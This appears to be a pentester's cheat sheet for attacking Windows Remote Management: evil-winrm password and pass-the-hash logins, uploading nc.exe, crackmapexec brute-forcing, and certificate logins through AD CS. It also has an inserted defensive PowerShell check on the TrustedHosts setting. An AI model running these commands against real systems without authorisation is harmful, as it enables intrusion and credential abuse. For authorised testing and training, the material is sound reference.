Enable WinRM

We first have to configure our attack machine to work with WinRM as well. We need to enable it and add any "victims" as trusted hosts. From an elevated PowerShell prompt, run the following two commands:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
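As an added example (not part of the original notes), a PowerShell check for the TrustedHosts setting just configured: the `*` wildcard lets the client send NTLM/Basic credentials to any host, so a scoped list is the safer option when you control the lab. The function names and the `<LAB_IP>`/`<LAB_HOST>` values are placeholders of my own.

```powershell
# Added example, not from the original notes: audit and scope the WinRM client
# TrustedHosts list instead of leaving the '*' wildcard from the command above.
# Function names are hypothetical; run from an elevated PowerShell prompt.

function Test-WinRMTrustedHosts {
    # Returns $true when the setting is empty or an explicit list, $false on '*'.
    $trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
    if ([string]::IsNullOrWhiteSpace($trusted)) {
        Write-Host 'TrustedHosts is empty: the client only talks to Kerberos-authenticated or HTTPS endpoints (safest).'
        return $true
    }
    if ($trusted.Split(',').Trim() -contains '*') {
        Write-Warning "TrustedHosts contains '*': NTLM/Basic credentials can be sent to any host."
        return $false
    }
    Write-Host "TrustedHosts is scoped to: $trusted"
    return $true
}

function Set-WinRMTrustedHostsScoped {
    # Replace the wildcard with only the hosts that are actually in scope.
    param([Parameter(Mandatory)][string[]]$Hosts)
    Set-Item WSMan:\localhost\Client\TrustedHosts -Value ($Hosts -join ',') -Force
}

# Usage: '<LAB_IP>' and '<LAB_HOST>' are placeholders for in-scope targets.
Set-WinRMTrustedHostsScoped -Hosts '<LAB_IP>', '<LAB_HOST>'
Test-WinRMTrustedHosts
```

Use `Set-Item ... -Concatenate` instead of the scoped function when you only want to append one more host to an existing list.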

Connecting to WinRM

  • To use evil-winrm against an IPv6 address, add an entry to /etc/hosts mapping a hostname to the IPv6 address and connect to that hostname instead.

# Install evil-winrm
gem install evil-winrm

# Password login (target given as IP or hostname)
evil-winrm -u Administrator -p 'Password' -i <IP or Domain>
# Pass-the-hash login
evil-winrm -u <username> -H <Hash> -i <IP>

# evil-winrm built-in commands (inside the session)
upload /home/kali/Tools/Windows/nc.exe

WinRM shell

  • Download the script and make necessary config changes.

  • In case of an SSL error, change the port from 5985 to 5986.

#Script Link:
gem install winrm
ruby winrm_shell.rb

Brute-force:
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

Certificate-based Authentication

We can use certificate-based auth (password-less) by creating certificates signed by the AD CS.

  • Pre-requisites: Access to Active Directory Certificate Services

  • Default location: http://<IP>/certsrv/

  • Script Link:

# Generate private key
openssl genrsa -aes256 -out myfile.key 2048

# Certificate signing request
openssl req -new -key myfile.key -out myfile.csr

# Sign the certificate as the user: sign in to http://<IP>/certsrv
# Paste the content of myfile.csr into the text field.
# Download the base64-encoded certificate.

# Append the connection options in winrm_shell.rb (winrm gem; zero-width characters removed)
conn = WinRM::Connection.new(
  endpoint: '',                  # e.g. https://<IP>:5986/wsman
  transport: :ssl,
  client_cert: 'certnew.cer',    # certificate downloaded from the server
  client_key: 'amanda.key',      # private key
  no_ssl_peer_verification: true
)

# Inspect the issued certificate
openssl x509 -in certnew.cer -text

gem install winrm
ruby winrm_shell.rb
